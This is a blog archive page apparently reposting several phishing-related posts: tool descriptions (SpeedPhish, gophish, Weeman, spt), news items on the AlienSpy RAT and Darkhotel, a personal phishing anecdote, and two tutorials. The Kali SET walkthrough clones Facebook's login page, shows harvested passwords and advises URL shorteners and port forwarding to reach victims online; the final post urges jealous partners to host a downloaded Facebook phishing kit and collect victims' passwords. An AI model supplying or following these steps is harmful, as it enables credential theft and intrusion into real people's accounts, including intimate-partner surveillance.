Affichage des articles dont le libellé est phishing. Afficher tous les articles

SpeedPhishing Framework for Email Phishing

SPF (SpeedPhish Framework) is a python tool designed to allow for quick recon and deployment of simple social engineering phishing exercises.

Requirements:

dnspython
twisted
PhantomJS

Usage:

usage: spf.py [-h] [-f ] [-C ] [--all] [--test] [-e]
              [-g] [-s] [--simulate] [-w] [-W] [-d ]
              [-c ] [--ip ] [-v] [-y]

optional arguments:
  -h, --help           show this help message and exit
  -d           domain name to phish
  -c   name of company to phish
  --ip     IP of webserver defaults to [192.168.1.124]
  -v, --verbosity      increase output verbosity

input files:
  -f         file containing list of email addresses
  -C       config file

enable flags:
  --all                enable ALL flags... same as (-e -g -s -w)
  --test               enable all flags EXCEPT sending of emails... same as
                       (-e -g --simulate -w -y -v -v)
  -e                   enable external tool utilization
  -g                   enable automated gathering of email targets
  -s                   enable automated sending of phishing emails to targets
  --simulate           simulate the sending of phishing emails to targets
  -w                   enable generation of phishing web sites
  -W                   leave web server running after termination of spf.py

misc:
  -y                   automatically answer yes to all questions

Execution:

cd spf
python spf.py --test -d example.com

or to just test the websites:

cd spf
python web.py default.cfg

Download and read more

by Malik korrich ~ vendredi 13 mai 2016 0 commentaires

Open-Source Phishing Framework: gophish

Gophish is a phishing framework that makes the simulation of real-world phishing attacks dead-simple. The idea behind gophish is simple – make industry-grade phishing training available to everyone.

“Available” in this case means two things –

Affordable – Gophish is currently open-source software that is completely free for anyone to use.

Accessible – Gophish is written in the Go programming language. This has the benefit that gophish releases are compiled binaries with no dependencies. In a nutshell, this makes installation as simple as “download and run”!

Let’s take a look at some of the features that really set gophish apart and make it awesome.

Hosted On-Prem

There are many commercial offerings that provide phishing simulation/training. Unfortunately, these are SaaS solutions that require you to hand over your data to someone else.

Gophish is different in that it is meant to be hosted in-house. This keeps you data where it belongs - with you.

Download -> Run

For the few existing in-house solutions that exist, setup can be a huge pain (looking at you, Ruby gems). Your time is too valuable to be spent wrestling with dependencies trying to create the perfect setup that somehow magically allows the program to run.

Gophish was written in the Go programming language for this exact reason. To install gophish, all you have to do is download the zip file, extract the contents, and run the binary.

By doing this, you just started two webservers, populated a database, and setup a background worker to handle sending the mails. Now, your time can be spent making campaigns. Easy peasy.

API’s for Everything.

Gophish was built with automation first. This means that you can create scripts and clients that automate all the hard work for you. In addition to this, we keep up-to-date API docs that describe each API endpoint in detail.

Download and learn more.

by Malik korrich ~ jeudi 11 février 2016 0 commentaires

HTTP Server for phishing in Python

HTTP server for phishing in python.

Usually you will want to run Weeman with DNS spoof attack. (see dsniff, ettercap).

Weeman will do the following steps:

Create fake html page.
Wait for clients
Grab the data (POST).
Try to login the client to the original page

Requirements

Python <= 2.7.
Python BeautifulSoup 4

Install Beautiful Soup

Archlinux - sudo pacman -S python2-beautifulsoup4
Ubuntu/Linuxmint - sudo apt-get install python-bs4
Fedora < 22 - sudo yum install python-beautifulsoup4
Fedora >= 22 - sudo dnf install python-beautifulsoup4
For another OS: - sudo pip install beautifulsoup4

Platforms

Linux (any)
Mac (Tested)
Windows (Not tested)

[!] If weeman runs on your platform (Windows), (or not), please let me know.

Usage

Just type help

Run server:

For port 80 you need to run Weeman as root!
Host to clone (Ex: www.social-networks.local)

set url http://www.social-networks.local
"<"form action = "TAKE THIS URL">"(View the site source and take the URL)

set action_url http://www.social-networks.local/sendlogin
The port Weeman server will listen

set port 2020
Start the server

run

The settings will be saved for the next time you run weeman.py.

Get Weeman

            git clone git://github.com/Hypsurus/weeman

by Malik korrich ~ samedi 3 octobre 2015 0 commentaires

Simple Phishing Toolkit Rebirth

The spt (rebirth) project is an open source phishing education toolkit that aims to help in securing the mind as opposed to securing computers. Organizations spend billions of dollars annually in an effort to safeguard information systems, but spend little to nothing on the under trained and susceptible minds that operate these systems, thus rendering most technical protections instantly ineffective. A simple, targeted link is all it takes to bypass the most advanced security protections. The link is clicked, the deed is done.

spt was developed from the ground up to provide a simple and easy to use framework to identify your weakest links so that you can patch the human vulnerability.

INSTALLATION

The Basics

Create and configure the MySQL database. spt will need a MySQL database to house its data, so go ahead and create that database and configure the associated user account for the new database with ALL PRIVILEGES assigned to it. Be sure you record the database name, user name and password in a safe place, you'll need it soon to install spt!
Ensure you have PHP 5.4
Extract the spt files from the archive.
Create a new directory on your web server, such as "spt" and upload the files to the directory.

Install spt

Open your web browser and navigate to the location where you uploaded the files and browse to install.php. For example, http://www.myhost.com/spt/install.php. If you accidentally just go to the root of the folder you placed the files in, you will be prompted to start the installation by clicking the right pointing arrow.
When prompted to accept the GNU General Public License, click the "I Agree!" button. For reference, you can read the full text of the license in the license.htm file included in the root of the extracted files.
On the next page, you will get feedback on the readiness of your server to install the spt. You can learn more about any failed items by hovering over the icon. Click the “Proceed!” button if all checks passed, or click the “Proceed Anyways” button if one of the checks failed and you have verified that the spt installer is reporting incorrectly.
On the next page, you will need to provide those database details from earlier. The default server and database ports are provided, be sure to change them if your installation will require something else. Enter in the remaining required information and click the "Install Database!" button to get things moving along.
If all goes well, you will see a listing of tables that have been successfully created. Click "Continue!" to move on.
If instead you see an error indicated, click the "
Now it's time to create your first user, for you! Enter your first and last name, email address and password and click the "Create User" button to continue on.
If you receive any errors, such as for an invalid email address or a password that does not meet the complexity requirements, click the "
Once you enter the required information successfully, you will receive confirmation. Click the "Proceed to Login" button to get logged into the spt!
Now it's time to login using the email address and password you entered in the previous step. See, that was easy!

Download & read more at

by Malik korrich ~ mardi 5 mai 2015 0 commentaires

AlienSpy using Global Phishing Campaigns to target Consumers and Enterprises

AlienSpy, a remote access Trojan (RAT) is currently being used in global phishing campaigns to target both consumers and enterprises to steal valuable data and compromise systems.

Remote Access Trojans (RATs) are often recycled and redeveloped in the changing cybersecurity landscape. These kinds of Trojans are exploited through phishing campaigns which use flawed emails and malicious files to deliver malware payload to affect particular industries, consumers or businesses.

According to security firm Fidelis, the newly-discovered AlienSpy Trojan is currently being used in international phishing campaigns against both consumers and the enterprise, although generally has been detected in campaigns based in the technology, finance, government and energy sectors.

AlienSpy currently supports infections on Windows, Linux, Mac OSX and the Android mobile operating system.

The Java-based Trojan provides an attacker a full access and control over a compromised system. The malware is able to collect system information including OS version, RAM data and computer name. It also uploads malware packages, capture webcam and microphone streams without consent.

The campaigns include njRAT, njWorm and Houdini RAT all of which are recognized to evolve in the nature of delivery rather than in core functionality. The security firm believes the new RAT has benefited from "unified," collaborative development. As a result, the Trojan is more sophisticated and has expanded functionality.

"Applying this technique makes it very difficult for network defenders to detect the malicious activity from infected nodes in the enterprise. To prevent various security tools from running, this version of AlienSpy performs various registry key changes," the security firm said. "Infected systems could end up with botnet malware downloaded through AlienSpy RAT (e.g. Citadel) as it was observed by our security researchers during one of the infections."

AlienSpy's additional capabilities include sandbox detection tool, the detection and disabling of antivirus software, and the use of Transport Layer Security (TLS) cryptographic protocols to secure its connection to the command and control (C&C) server.

by Malik korrich ~ jeudi 9 avril 2015 0 commentaires

Darkhotel Attackers Target CEOs

Hackers have developed a scheme to steal sensitive information from top executives by penetrating the Wi-Fi networks of luxury hotels, security researchers said Monday.

Dubbed the "Darkhotel APT," the threat actors use three different malware distribution methods, including malicious Wi-Fi networks, booby-trapped P2P torrents, and highly customized spear phishing, Kaspersky Lab noted in research paper.

Kaspersky said about 90 percent of the infections appear to be located in Japan, Taiwan, China, Russia and South Korea, but that the executives targeted include those traveling from the United States and other countries.

"The more interesting traveling targets include top executives from the US and Asia doing business and investment in the (Asia-Pacific) region."

The attackers’ methods include the use of zero-day exploits to target executives in spear-phishing attacks as well as a kernel-mode keystroke logger to siphon data from victim machines. They also managed to crack weak digital signing keys to generate certificates for signing their malware, in order to make malicious files appear to be legitimate software.

“Obviously, we’re not dealing with an average actor,” says Raiu. “This is a top-class threat actor. Their ability to do the kernel-mode key logger is rare, the reverse engineering of the certificate, the leveraging of zero days—that puts them in a special category.”

These types of attacks were first recorded in 2007, but activity spiked in August 2010 and has continued through to this year, the research found. Executives from electronics makers, pharmaceutical companies and military organizations were among the targets.

The key-logging tool's code is written in Korean, but Kaspersky said this did not necessarily mean the hackers were from Korea. It was also difficult at this stage in the investigation to tell if the attacks were state-backed, Raiu added.

The number of hotels that have been hit is also unknown. So far the researchers have found fewer than a dozen hotels with infection indicators. “Maybe there are some hotels that … use to be infected and we just cannot learn about that because there are no traces,” the network-management executive says.

The company worked with Kaspersky to scour all of the hotel servers it manages for any traces of malware and are “fairly confident that the malware doesn’t sit on any hotel server today.” But that is just one network-management company. Presumably, the DarkHotel operation is still active on other networks.

Wired report

by Malik korrich ~ mercredi 12 novembre 2014 0 commentaires

Real Life Phishing Scenario : Zero Day google bug

A reader on my blog tried to hack my account

Now all this time I've been teaching people how to hack Wireless networks, Windows machines, Websites and Social Networking accounts. All this we did in Kali Linux. For once, I'm moving away from the operating system and narrating a real life incidence of how someone almost got my Email account and password, and could have possibly infected me with a RAT (remote administration tool). He didn't really mean to hack my account, but was rather interested in making a point. So this is how it happened.

How it started

Everyday, I check my blogger dashboard to see if there are any new comments on my blog. Today morning, I saw an anonymous comment (most of the comments are anonymous so that didn't alarm me) saying that the person needed my help with something but would only contact me via mail. I couldn't give him my personal mail address so I decided to use my website's mail instead, and sent him a message. This was his reply

Looked fair enough. Out of curiosity I clicked the link and it took me to a google drive login page. Everything looked pretty convincing, and I could have easily entered my credentials into the login form, if it were not for the slightly suspicious URL. Also, it was https and chrome verified the digital certificates to be that of google. Faking this can be assumed to be next to be impossible. However, I still was cautious, considering that I run a hacking blog and it's not unlikely that a person visiting here might be good, maybe million times better than me.

What I did

So, I decided, I cannot just dismiss the page as phishing as such without trying. So I entered the email:abcd@gmail.com and password:lookslikephishing and pressed sign in. Now if it were a real page, it would have said incorrect password, but this page had no mechanism for verifying the form data, it actually just kept logging everything (i.e. it recorded whatever someone entered in the form) and would simply download the PDF no matter what we entered in the form. So, after entering the bogus login data, the PDF download started. It completed successfully and I ran the PDF. The content looked genuine and then I realized, well, what if this was a 2 fold attack, first phishing, followed by infection. He could have used a FUD remote administration tool which my antivirus wouldn't be able to detect. I have Windows Defender on my Windows 8 machine, but with proper crypting , anti-viruses can be evaded. So after this, I went to white hat section of hackforums and asked for help (everyone needs help at some time or the other, and I suck at forensics and related stuff) . An expert analyzed my computer thoroughly via teamviewer, and the file was clean indeed. Meanwhile, the following mails had been sent to me.

Mails Recieved

He sent me some mails

He knew I found out the phishing page thing

He said he wants me to spread public awareness regarding this kind of phishing

I replied to him saying that I'm finding out and cleaning the malware he sent me (if any). He replied and said he didn't send any malware or anything.

Finally

I contacted him via FB. He turned out to be a fellow Indian and was even younger than me (I'm 17 he is 16). By this time I had finished my investigation, and the White hat expert from Hackforums didn't find anything either. I finally concluded that either there is no malware, or he's just too good. Latter is quite unlikely since he was not able to dig up my personal email address on his own. Believe me that's really easy to do. After having a conversation with him and doing some research on this HTTPS phishing page, I realized that it is done using a bug in Google drive, which has been discussed on The Hacker News. I will see if I can replicate a HTTPS phishing website using this bug, and post a tutorial on how to do it. The sole intent of this post is to make people aware that Phishing is a real threat, and to encourage Google to fix this bug soon. Either ways, they will surely patch this bug after I write the tutorial on creating a Phishing page using Google Drive, as Google won't want it's user's accounts to be compromised by any random kid with a laptop who ended up on this website. Already they have applied a patch which makes carrying this out difficult and during the earlier days of this vulnerability, the URL was short and not suspicious at all, but now it's very long (see the screenshots). Update : Google is probably not going to do anything about the issue as it is not a bug and I'm not gonna take the risk of writing anything which will usher upon me the wrath of Google (as I use blogger for hosting and blogger is owned by google). Google Drive, just like Dropbox allows hosting simple HTML sites like this phishing one. This can be abused, since some people will not know that this is a malicious document uploaded by someone and not a legit Google Drive login page, but it still is not a bug.

Hacker's message on FB

After I told the hacker on Facebook about this post even he acknowledged that everything about this attack is perfect but the URL which earlier used to start with google drive now has a long suspicious prefix. The vulnerability has been half patched and google will possibly patch the remaining thing soon.

by Malik korrich ~ vendredi 20 juin 2014 0 commentaires

Social Engineering Toolkit - Kali : Credential Harvestor : Hack Facebook

Hacking Facebook

In the previous post I've discussed how not to hack Facebook. Here we will discuss how to hack Facebook. This tutorial is meant for enhancing you networking skills, as well as to develop understanding of how fake web pages are created, so that you can protect yourself from such attacks. Don't use this information to hack someone's account, or you'll run the risk of getting into legal troubles. If you haven't yet read the previous post, you should. It might not be very enlightening in terms of technical details, but it quite enjoyable and will provide you with a background of what we are looking at.

Social Engineering Toolkit

Humans are the weakest link in any security system ~Shashwat (That'll be me)

If you have read the previous post, then you know what I'm talking about. Social engineering toolkit does not exploit vulnerability in the mechanism of any service. It exploits the weakness in the human element of security. Some official words from the official guys before we move on to the actual hacking

The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.

Kali Linux

I don't feel the need to mention it, but I'll still do it. You need Kali Linux to proceed with this tutorial. Check out the top of the page and see the "Kali Linux complete" tutorial. Better yet, I'll link it here- Kali Linux : What it is and how to install

Se-toolkit

Start Kali Linux. In a console/terminal type se-toolkit.

Something like this will show up

root@kali:~# se-toolkit
[-] New set_config.py file generated on: 2014-05-26 08:26:33.526119
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2014-05-26 08:26:33.526119
[*] SET is using the new config, no need to restart

_______________________________
/ _____/\_ _____/\__ ___/
\_____ \ | __)_ | |
/ \ | \ | |
/_______ //_______ / |____|
\/ \/
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Version: 4.3.9 [---]
[---] Codename: 'Turbulence' [---]
[---] Follow us on Twitter: @trustedsec [---]
[---] Follow me on Twitter: @dave_rel1k [---]
[---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET). The one
stop shop for all of your social-engineering needs.

Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set>

Now type the following and press enter.
1 [enter] 2 [enter] 3 [enter]

Explanation

1 selects social engineering attacks. Obvious choice if you read the other options from 1 to 9 (and 99 for exit)
The 2 selects Website Attack Vectors. Not that obvious. The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
Then, the 3 selects Credential Harvestor. The Credential Harvester method will utilize web cloning of a web-site that has a username and password field and harvest all the information posted to the website.

Now you'll be seeing something like this-

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu

Type 2 to select site cloner.

Find your IP

On a new terminal type ifconfig. This will give you your ipv4 address, which is what you are looking for

Back to se-toolkit

Now it'll ask you to specify the IP to which the data is supposed to be sent to. That'll be your IP address. Since this is your internal IP address (i.e. local IP), the fake facebook page will work only for computers connected with your LAN.

Now it'll ask for the page to be cloned. Enter https://www.facebook.com/.

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.154.133
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://www.facebook.com/

Now in your browser on Kali Linux, enter your IP. It will display facebook login page. Enter any info and press login. You will get the information in se-toolkit. If you are using VMWare or virtualbox, then you can try and enter the IP on the browsers there. It will work.

Live demonstration

To make sure that the demonstration is not just a repetition of what you already know, I have decided to clone the login page of facebook, instead of homepage. It will be a tad bit different. Here is a screenshot of what I did.

The IP address is my internal address from ifconfig, which comes out to be 192.168.154.133. The cloned page is https://www.facebook.com/login.php. Now we will try to see if this credential harvestor works.

On the Kali Linux Machine itself

Entering the IP in browser shows you the fake login page. Also, se-toolkit registers the visit and says 192.168.154.133 - - [27/May/2014 02:32:32] "GET / HTTP/1.1" 200 -

Now if we enter something in the field, it also shows up on se-toolkit. I entered 'hackingwithkalilinux' in username field and 'password' in password field. This is what se-toolkit shows-

POSSIBLE USERNAME FIELD FOUND: email=hackingwithkalilinux
POSSIBLE PASSWORD FIELD FOUND: pass=password

Also note that se-toolkit might keeping dumping more stuff in the console, most of which is not important for the time being.

On Windows 8 machine (host)

Now I'm running Kali on a virtual machine. Windows 8 is the host machine, and we might want to check if it works on Windows 8. Also, we would also like to see if modern browsers are able to observe anything wrong with the page, and if the firewall stops the data flow.

I entered windows8host and password2 and pressed the login button. This is what I got. Also, as I was logged in to Facebook with my personal account, the fake page redirected me to facebook.

POSSIBLE USERNAME FIELD FOUND: email=windows8host
POSSIBLE PASSWORD FIELD FOUND: pass=password2

Conclusion : This method pretty much works well over LAN.

Make it work over internet

To make the technique work over internet, you will need to use your public IP instead of private. Search google for what is my IP to find you public IP. Then use it. You can use tinyurl or something to make the url appear legitimate. Also, port forwarding might need to be enabled, as your router might block traffic on port 80. Firewall can also cause troubles. While this tutorial was nothing more than - se-toolkit 1 2 3 [your IP] [facebook.com], the next post on getting your credential harvestor on the internet will make the tutorial complete and useful in practical sense. Next tutorial will help you make your fake login page accessible over the internet. ~~[Coming Soon]~~ There you go - http://www.kalitutorials.net/2014/05/credential-harvestor-port-forwarding.html

by Malik korrich ~ lundi 26 mai 2014 0 commentaires

How To Hack Facebook Using Phishing Method

Lately, many facebook user want to hack other facebook users' account especially jealous Girlfriend or Boyfriend. This method is quite easy and can make you get a lot of email and password.

Understanding the Attack Method

A phishing page is used to steal login credentials and other valuable information such as credit card details.A phishing page appears to be exact copy of a legitimate page but it is coded for stealing.

Preparing the Weapons

1- First, download the files HERE

2- You need to have a web hosting account. Just register yourself at any of free webhosting site. This is my suggestion :

000webhost

110mb

Ripway

SuperFreeHost

Freehostia

Freeweb7

t35

Awardspace

PHPNet

Free Web Hosting Pro

ProHosts

FreeZoka

AtSpace

As for me, I will use 000webhost, so firstly, go to the webpage and register yourself there.

I suggest you to choose free subdomain. Just write the name of your website in the column. Your website name must be interesting, so it can makes the victim attracted. Fill up the forms, fill in the recaptcha given , agree with their term of service and then click Create My Account.

A verification email will be send to your email account. Verify and login to your 000webhost account. Once you have logged in, you will see List of your domain . Click Go To Cpanel.

Scroll down the page, you will see the File Manager. The icon is like this

Click your file manager, and you will be redirect here

After that, click public_html folder and you will see 2 files, such as default.php and .htaccess

Click Upload and you will get this

At here,

Click choose file and browse for the FacebookPhishing.zip that you have downloaded.

Upload them. And you will get something like this

Now your phishing site have DONE! :)

Go to your site, and you will get a clone of Facebook login page :D

Attacking

Now, what you need is to spread/send your phishing site link to your victims. Once they have logged in a text file named pasu.txt will be generated. The victims' email and password will be there. Go to your file manager and check the text file. It would be somethin like this

Yeay! Now you have hacked a Facebook Account ^_^

That's all Phishing Tutorial from me. More Facebook hacking trick will be posted soon :)

Leave a comment if you have any query, or you can contact me on Facebook :)

By Black Eagle

by Malik korrich ~ samedi 21 décembre 2013 0 commentaires